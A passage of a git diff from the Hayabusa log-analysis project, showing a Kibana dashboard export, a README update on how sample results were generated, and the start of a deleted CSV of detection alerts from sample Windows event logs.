Level\",\"description\":\"\",\"visualizationType\":\"lnsPie\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-41bca02b-ab6b-4422-9761-edadaf1e95ce\"}],\"state\":{\"visualization\":{\"shape\":\"pie\",\"layers\":[{\"layerId\":\"41bca02b-ab6b-4422-9761-edadaf1e95ce\",\"groups\":[\"28876efd-84a4-4ebb-9d29-998b1c6d53f6\"],\"metric\":\"4c54f46f-5df6-43a6-8200-10ae8a112f44\",\"numberDisplay\":\"percent\",\"categoryDisplay\":\"default\",\"legendDisplay\":\"default\",\"nestedLegend\":false,\"layerType\":\"data\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"41bca02b-ab6b-4422-9761-edadaf1e95ce\":{\"columns\":{\"28876efd-84a4-4ebb-9d29-998b1c6d53f6\":{\"label\":\"Top values of Level\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Level\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"4c54f46f-5df6-43a6-8200-10ae8a112f44\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"4c54f46f-5df6-43a6-8200-10ae8a112f44\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"28876efd-84a4-4ebb-9d29-998b1c6d53f6\",\"4c54f46f-5df6-43a6-8200-10ae8a112f44\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":12,\"y\":0,\"w\":11,\"h\":17,\"i\":\"738fb5e1-834b-465e-b6ba-4de422c663d9\"},\"panelIndex\":\"738fb5e1-834b-465e-b6ba-4de422c663d9\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Detection Rule\",\"description\":\"\",\"visualizationType\":\"lnsPie\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-aaacd848-cb93-46e9-acf1-070f6b39dace\"}],\"state\":{\"visualization\":{\"shape\":\"donut\",\"layers\":[{\"layerId\":\"aaacd848-cb93-46e9-acf1-070f6b39dace\",\"groups\":[\"7eae6d74-b193-42e1-b5c4-c5fb6c7deb12\"],\"metric\":\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\",\"numberDisplay\":\"percent\",\"categoryDisplay\":\"default\",\"legendDisplay\":\"default\",\"nestedLegend\":false,\"layerType\":\"data\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"aaacd848-cb93-46e9-acf1-070f6b39dace\":{\"columns\":{\"7eae6d74-b193-42e1-b5c4-c5fb6c7deb12\":{\"label\":\"Top values of RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"7eae6d74-b193-42e1-b5c4-c5fb6c7deb12\",\"bf28ae0f-2ad8-452b-94d7-6fbf385228ee\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":23,\"y\":0,\"w\":11,\"h\":17,\"i\":\"54a171e3-5440-4171-8991-e07417a3e2cd\"},\"panelIndex\":\"54a171e3-5440-4171-8991-e07417a3e2cd\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Event ID\",\"description\":\"\",\"visualizationType\":\"lnsPie\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-4dd9733a-b2c3-449d-a7b8-78bf2f7621ab\"}],\"state\":{\"visualization\":{\"shape\":\"donut\",\"layers\":[{\"layerId\":\"4dd9733a-b2c3-449d-a7b8-78bf2f7621ab\",\"groups\":[\"090a1665-f0e8-4450-bfd0-d76eb9e9e7fd\"],\"metric\":\"8459d081-19df-43db-a545-120ed19db287\",\"numberDisplay\":\"percent\",\"categoryDisplay\":\"default\",\"legendDisplay\":\"default\",\"nestedLegend\":false,\"layerType\":\"data\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"4dd9733a-b2c3-449d-a7b8-78bf2f7621ab\":{\"columns\":{\"090a1665-f0e8-4450-bfd0-d76eb9e9e7fd\":{\"label\":\"Top values of EventID\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"EventID\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"8459d081-19df-43db-a545-120ed19db287\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"8459d081-19df-43db-a545-120ed19db287\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"090a1665-f0e8-4450-bfd0-d76eb9e9e7fd\",\"8459d081-19df-43db-a545-120ed19db287\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":34,\"y\":0,\"w\":11,\"h\":17,\"i\":\"2d258460-f836-4b9b-9e32-6bce96b0851b\"},\"panelIndex\":\"2d258460-f836-4b9b-9e32-6bce96b0851b\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Computer Names\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-a2f6321e-66ca-44f9-b1b5-a64203a0333f\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"abf4669d-ca1a-4e29-bf6b-580c0155bc9a\"},{\"isTransposed\":false,\"columnId\":\"18cef55c-e7fa-4178-8e2f-9708acbe4254\"}],\"layerId\":\"a2f6321e-66ca-44f9-b1b5-a64203a0333f\",\"layerType\":\"data\"},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"a2f6321e-66ca-44f9-b1b5-a64203a0333f\":{\"columns\":{\"abf4669d-ca1a-4e29-bf6b-580c0155bc9a\":{\"label\":\"Top values of Computer\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Computer\",\"isBucketed\":true,\"params\":{\"size\":10,\"orderBy\":{\"type\":\"column\",\"columnId\":\"18cef55c-e7fa-4178-8e2f-9708acbe4254\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"18cef55c-e7fa-4178-8e2f-9708acbe4254\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"abf4669d-ca1a-4e29-bf6b-580c0155bc9a\",\"18cef55c-e7fa-4178-8e2f-9708acbe4254\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":0,\"y\":17,\"w\":45,\"h\":13,\"i\":\"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0\"},\"panelIndex\":\"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Risk Over Time\",\"description\":\"\",\"visualizationType\":\"lnsXY\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-75d03fdf-bd36-47d9-851c-a78cacecb37f\"}],\"state\":{\"visualization\":{\"legend\":{\"isVisible\":true,\"position\":\"right\"},\"valueLabels\":\"hide\",\"fittingFunction\":\"None\",\"yLeftExtent\":{\"mode\":\"full\"},\"yRightExtent\":{\"mode\":\"full\"},\"axisTitlesVisibilitySettings\":{\"x\":true,\"yLeft\":true,\"yRight\":true},\"tickLabelsVisibilitySettings\":{\"x\":true,\"yLeft\":true,\"yRight\":true},\"labelsOrientation\":{\"x\":0,\"yLeft\":0,\"yRight\":0},\"gridlinesVisibilitySettings\":{\"x\":true,\"yLeft\":true,\"yRight\":true},\"preferredSeriesType\":\"bar_stacked\",\"layers\":[{\"layerId\":\"75d03fdf-bd36-47d9-851c-a78cacecb37f\",\"accessors\":[\"c5277819-371a-4f5a-97e4-df763b276b1f\"],\"position\":\"top\",\"seriesType\":\"bar_stacked\",\"showGridlines\":false,\"layerType\":\"data\",\"xAccessor\":\"4c31cd0a-08e8-4266-910d-14717b06ac2f\",\"splitAccessor\":\"8ebfda45-9671-4fb6-a253-06b90d989ae3\"}]},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"75d03fdf-bd36-47d9-851c-a78cacecb37f\":{\"columns\":{\"8ebfda45-9671-4fb6-a253-06b90d989ae3\":{\"label\":\"Top values of Level\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Level\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"c5277819-371a-4f5a-97e4-df763b276b1f\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"4c31cd0a-08e8-4266-910d-14717b06ac2f\":{\"label\":\"@timestamp\",\"dataType\":\"date\",\"operationType\":\"date_histogram\",\"sourceField\":\"@timestamp\",\"isBucketed\":true,\"scale\":\"interval\",\"params\":{\"interval\":\"auto\"}},\"c5277819-371a-4f5a-97e4-df763b276b1f\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"8ebfda45-9671-4fb6-a253-06b90d989ae3\",\"4c31cd0a-08e8-4266-910d-14717b06ac2f\",\"c5277819-371a-4f5a-97e4-df763b276b1f\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":0,\"y\":30,\"w\":20,\"h\":17,\"i\":\"d18ce65d-f280-4428-a6a7-6cebe812efd7\"},\"panelIndex\":\"d18ce65d-f280-4428-a6a7-6cebe812efd7\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Top 10 Alerts\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-ad48706c-2160-4d2f-93e9-afba4411ac58\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"841c01be-d9b7-4dba-a2b3-11f449677fac\"},{\"isTransposed\":false,\"columnId\":\"8448dbd4-ea47-435e-a197-6f17a6eae336\"},{\"columnId\":\"d815af3a-f2de-49cc-a5bf-742519a538e5\",\"isTransposed\":true}],\"layerId\":\"ad48706c-2160-4d2f-93e9-afba4411ac58\",\"layerType\":\"data\"},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"ad48706c-2160-4d2f-93e9-afba4411ac58\":{\"columns\":{\"841c01be-d9b7-4dba-a2b3-11f449677fac\":{\"label\":\"Top values of RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"8448dbd4-ea47-435e-a197-6f17a6eae336\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"8448dbd4-ea47-435e-a197-6f17a6eae336\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"},\"d815af3a-f2de-49cc-a5bf-742519a538e5\":{\"label\":\"Top values of Level\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"Level\",\"isBucketed\":true,\"params\":{\"size\":5,\"orderBy\":{\"type\":\"column\",\"columnId\":\"8448dbd4-ea47-435e-a197-6f17a6eae336\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}}},\"columnOrder\":[\"d815af3a-f2de-49cc-a5bf-742519a538e5\",\"841c01be-d9b7-4dba-a2b3-11f449677fac\",\"8448dbd4-ea47-435e-a197-6f17a6eae336\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":20,\"y\":30,\"w\":13,\"h\":17,\"i\":\"7e2d20a9-16d4-4c02-9859-b6ac2798355d\"},\"panelIndex\":\"7e2d20a9-16d4-4c02-9859-b6ac2798355d\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Top 10 Critical Alerts\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-bc8d7445-5f2c-4a8d-b771-1c19138bf11e\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"aa763230-c5d1-43bc-8606-b58c20380b9f\"},{\"isTransposed\":false,\"columnId\":\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\"}],\"layerId\":\"bc8d7445-5f2c-4a8d-b771-1c19138bf11e\",\"layerType\":\"data\"},\"query\":{\"query\":\"Level:\\\"critical\\\" \",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"bc8d7445-5f2c-4a8d-b771-1c19138bf11e\":{\"columns\":{\"aa763230-c5d1-43bc-8606-b58c20380b9f\":{\"label\":\"Top values of RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":10,\"orderBy\":{\"type\":\"column\",\"columnId\":\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"aa763230-c5d1-43bc-8606-b58c20380b9f\",\"4ebf9bbd-1ac4-49a2-afab-e1122c99a8a1\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"lens\",\"gridData\":{\"x\":33,\"y\":30,\"w\":12,\"h\":17,\"i\":\"721424a7-8543-445e-8b33-59666fc98f2a\"},\"panelIndex\":\"721424a7-8543-445e-8b33-59666fc98f2a\",\"embeddableConfig\":{\"attributes\":{\"title\":\"Top 10 High Alerts\",\"description\":\"\",\"visualizationType\":\"lnsDatatable\",\"type\":\"lens\",\"references\":[{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-current-indexpattern\"},{\"type\":\"index-pattern\",\"id\":\"8e85a670-bc4d-11ec-b4f7-8347b07fe863\",\"name\":\"indexpattern-datasource-layer-90df50b6-ceec-47d6-8609-a4cf7e6f7ec0\"}],\"state\":{\"visualization\":{\"columns\":[{\"isTransposed\":false,\"columnId\":\"eadb527b-9160-4fd2-9d4d-4059f4dd3a6b\"},{\"isTransposed\":false,\"columnId\":\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\"}],\"layerId\":\"90df50b6-ceec-47d6-8609-a4cf7e6f7ec0\",\"layerType\":\"data\"},\"query\":{\"query\":\"Level:\\\"high\\\" \",\"language\":\"kuery\"},\"filters\":[],\"datasourceStates\":{\"indexpattern\":{\"layers\":{\"90df50b6-ceec-47d6-8609-a4cf7e6f7ec0\":{\"columns\":{\"eadb527b-9160-4fd2-9d4d-4059f4dd3a6b\":{\"label\":\"Top values of RuleTitle\",\"dataType\":\"string\",\"operationType\":\"terms\",\"scale\":\"ordinal\",\"sourceField\":\"RuleTitle\",\"isBucketed\":true,\"params\":{\"size\":10,\"orderBy\":{\"type\":\"column\",\"columnId\":\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\"},\"orderDirection\":\"desc\",\"otherBucket\":true,\"missingBucket\":false}},\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\":{\"label\":\"Count of records\",\"dataType\":\"number\",\"operationType\":\"count\",\"isBucketed\":false,\"scale\":\"ratio\",\"sourceField\":\"Records\"}},\"columnOrder\":[\"eadb527b-9160-4fd2-9d4d-4059f4dd3a6b\",\"435bd7ff-9770-4bf6-9ce3-52469d1b8d24\"],\"incompleteColumns\":{}}}}}}},\"enhancements\":{}}},{\"version\":\"7.17.1\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":47,\"w\":45,\"h\":30,\"i\":\"dda19205-5619-4f11-b6ec-e33c86cfb330\"},\"panelIndex\":\"dda19205-5619-4f11-b6ec-e33c86cfb330\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_dda19205-5619-4f11-b6ec-e33c86cfb330\"}]","timeRestore":false,"title":"Hayabusa Dashboard","version":1},"coreMigrationVersion":"7.17.1","id":"332ec800-bc67-11ec-b4f7-8347b07fe863","migrationVersion":{"dashboard":"7.17.0"},"references":[{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"1af33197-eac8-463d-ae7e-3b8a89568122:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"1af33197-eac8-463d-ae7e-3b8a89568122:indexpattern-datasource-layer-41bca02b-ab6b-4422-9761-edadaf1e95ce","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"738fb5e1-834b-465e-b6ba-4de422c663d9:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"738fb5e1-834b-465e-b6ba-4de422c663d9:indexpattern-datasource-layer-aaacd848-cb93-46e9-acf1-070f6b39dace","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"54a171e3-5440-4171-8991-e07417a3e2cd:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"54a171e3-5440-4171-8991-e07417a3e2cd:indexpattern-datasource-layer-4dd9733a-b2c3-449d-a7b8-78bf2f7621ab","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"2d258460-f836-4b9b-9e32-6bce96b0851b:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"2d258460-f836-4b9b-9e32-6bce96b0851b:indexpattern-datasource-layer-a2f6321e-66ca-44f9-b1b5-a64203a0333f","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7c5f7c70-7d78-4d68-803c-4222b5c5e5c0:indexpattern-datasource-layer-75d03fdf-bd36-47d9-851c-a78cacecb37f","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"d18ce65d-f280-4428-a6a7-6cebe812efd7:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"d18ce65d-f280-4428-a6a7-6cebe812efd7:indexpattern-datasource-layer-ad48706c-2160-4d2f-93e9-afba4411ac58","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7e2d20a9-16d4-4c02-9859-b6ac2798355d:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"7e2d20a9-16d4-4c02-9859-b6ac2798355d:indexpattern-datasource-layer-bc8d7445-5f2c-4a8d-b771-1c19138bf11e","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"721424a7-8543-445e-8b33-59666fc98f2a:indexpattern-datasource-current-indexpattern","type":"index-pattern"},{"id":"8e85a670-bc4d-11ec-b4f7-8347b07fe863","name":"721424a7-8543-445e-8b33-59666fc98f2a:indexpattern-datasource-layer-90df50b6-ceec-47d6-8609-a4cf7e6f7ec0","type":"index-pattern"},{"id":"d0e3ad60-bc6a-11ec-b4f7-8347b07fe863","name":"dda19205-5619-4f11-b6ec-e33c86cfb330:panel_dda19205-5619-4f11-b6ec-e33c86cfb330","type":"search"}],"type":"dashboard","updated_at":"2022-04-15T03:25:13.683Z","version":"WzE3MzQsM10="} +{"excludedObjects":[],"excludedObjectsCount":0,"exportedCount":3,"missingRefCount":0,"missingReferences":[]} \ No newline at end of file diff --git a/sample-results/README.md b/sample-results/README.md index 7cfd8937..1fe9e0c2 100644 --- a/sample-results/README.md +++ b/sample-results/README.md @@ -1,11 +1,6 @@ -`hayabusa-sample-evtx-ResultsDefaultSettings.csv` was created by running: +`hayabusa-sample-results-2022-04-16.csv` was created by running: ```bash -hayabusa.exe -d ./hayabusa-sample-evtx -o hayabusa-sample-evtx-ResultsDefaultSettings.csv +hayabusa.exe -d ./hayabusa-sample-evtx -o hayabusa-sample-results-2022-04-16.csv -U ``` -`hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv` was created running: -```bash -hayabusa.exe -d ./hayabusa-sample-evtx -D -n -o hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv -``` - -The two .xlsx files were created in Excel after importing the CSV files and manually adding color to the different severity levels. +The sample evtx files used came from [this](https://github.com/Yamato-Security/hayabusa-sample-evtx) repository. \ No newline at end of file diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv deleted file mode 100644 index 0ae6f001..00000000 --- a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv +++ /dev/null @@ -1,10073 +0,0 @@ -Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath -2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 